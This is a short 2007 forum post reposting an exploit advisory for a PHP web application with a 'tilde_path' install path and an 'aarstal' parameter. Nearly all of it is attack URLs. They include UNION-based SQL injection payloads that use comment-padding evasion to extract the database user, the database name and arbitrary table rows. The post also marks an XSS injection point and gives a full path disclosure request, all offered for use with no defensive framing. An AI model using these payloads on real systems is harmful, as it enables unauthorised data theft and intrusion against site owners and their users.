drgs Posted November 27, 2007 Report Posted November 27, 2007 #By KiNgOfThEwOrLd ---------------------------------------------------------------PoCD'u need an explanation?!? i don't think so ---------------------------------------------------------------SQL Injection[url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27Little examplesUsing user() and database() functions u can get some informations about the database...as:[url]http://[target]/[/url][tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*Or u can get some recordes by the database like:[url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*D'u want the tables n' the rows? Find it yourself ;P---------------------------------------------------------------something else..Xss Vulnerability[url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS]---------------------------------------------------------------Full Path Disclosure[url]http://[target]/[/url][tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on--------------------------------------------------------------- Quote